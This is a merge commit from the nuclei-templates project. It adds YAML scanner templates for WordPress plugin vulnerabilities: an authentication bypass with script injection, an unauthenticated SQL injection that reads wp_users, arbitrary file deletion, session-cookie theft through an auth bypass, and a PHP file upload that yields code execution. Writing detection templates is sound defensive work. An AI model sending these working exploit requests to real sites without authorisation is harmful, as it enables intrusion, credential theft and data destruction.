Merge pull request #1076 from projectdiscovery/wordpress-cves

Wordpress cves
patch-1
PD-Team 2021-03-12 18:05:29 +05:30 committed by GitHub
commit 40736bbead
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 310 additions and 4 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2018-3810
info:
name: WordPress Smart Google Code Inserter Authentication Bypass
author: princechaddha
severity: critical
reference: https://www.exploit-db.com/exploits/43420
tags: wordpress,auth-bypass,cve,cve2018
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '<script>console.log("Nuclei - Open-source project [github.com/projectdiscovery/nuclei]")</script>'
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2020-14092
info:
name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10287
tags: cve,cve2020,wordpress,wp-plugin,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,79 @@
id: CVE-2020-35951
info:
name: Wordpress Quiz and Survey Master Arbitrary File Deletion
author: princechaddha
severity: critical
reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 269
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
qsm_remove_file_fd_question
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="file_url"
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
extractors:
- type: regex
name: fullpath
internal: true
part: body
group: 1
regex:
- "not found in <b>([/a-z_]+)wp"
req-condition: true
matchers-condition: or
matchers:
- type: word
words:
- '{"type":"success","message":"File removed successfully"}'
part: body
- type: dsl
dsl:
- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"

View File

@ -26,7 +26,6 @@ requests:
- '{{BaseURL}}/wp-config.php~' - '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php.orig' - '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original' - '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/wp-license.php?file=../..//wp-config'
- '{{BaseURL}}/_wpeprivate/config.json' - '{{BaseURL}}/_wpeprivate/config.json'
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -0,0 +1,50 @@
id: wordpress-auth-bypass-wptimecapsule
info:
name: WordPress WP Time Capsule Authentication Bypass
author: princechaddha
severity: critical
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
tags: wordpress,auth-bypass,wp-plugin
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
IWP_JSON_PREFIX
- |
GET /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
- "<h1>Dashboard</h1>"
part: body
condition: and
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200
extractors:
- type: regex
part: header
regex:
- "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"

View File

@ -0,0 +1,74 @@
id: wordpress-rce-simplefilelist
info:
name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
author: princechaddha
severity: critical
reference: https://wpscan.com/vulnerability/10192
tags: wordpress,wp-plugin,rce
requests:
- raw:
- |
POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
Content-Length: 693
Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_ID"
1
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
/wp-content/uploads/simple-file-list/
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Timestamp"
1587258885
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="eeSFL_Token"
ba288252629a5399759b6fde1e205bc2
--6985fa39c0698d07f6d418b37388e1b2
Content-Disposition: form-data; name="file"; filename="nuclei.png"
Content-Type: image/png
<?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?>
--6985fa39c0698d07f6d418b37388e1b2--
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.25.1
Accept: */*
Connection: close
X-Requested-With: XMLHttpRequest
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
- |
GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: wordpress-total-upkeep-backup-download
info:
name: WordPress Total Upkeep Database and Files Backup Download
author: princechaddha
severity: high
reference: https://www.exploit-db.com/exploits/49252
tags: wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"filepath"'
- '/wp-content/boldgrid_backup_'
condition: and
part: body
- type: status
status:
- 200

View File

@ -5,15 +5,13 @@ info:
description: A simple workflow that runs all wordpress related nuclei templates on a given target. description: A simple workflow that runs all wordpress related nuclei templates on a given target.
tags: workflow tags: workflow
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
# Old workflows still remains valid, and will be working with all nuclei versions.
workflows: workflows:
- template: technologies/tech-detect.yaml - template: technologies/tech-detect.yaml
matchers: matchers:
- name: wordpress - name: wordpress
subtemplates: subtemplates:
- template: cves/2018/CVE-2018-3810.yaml
- template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6112.yaml
- template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-6715.yaml
- template: cves/2019/CVE-2019-9978.yaml - template: cves/2019/CVE-2019-9978.yaml
@ -25,6 +23,11 @@ workflows:
- template: cves/2020/CVE-2020-24312.yaml - template: cves/2020/CVE-2020-24312.yaml
- template: cves/2020/CVE-2020-25213.yaml - template: cves/2020/CVE-2020-25213.yaml
- template: cves/2020/CVE-2020-13700.yaml - template: cves/2020/CVE-2020-13700.yaml
- template: cves/2020/CVE-2020-14092.yaml
- template: cves/2020/CVE-2020-35951.yaml
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
- template: vulnerabilities/wordpress/sassy-social-share.yaml - template: vulnerabilities/wordpress/sassy-social-share.yaml
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml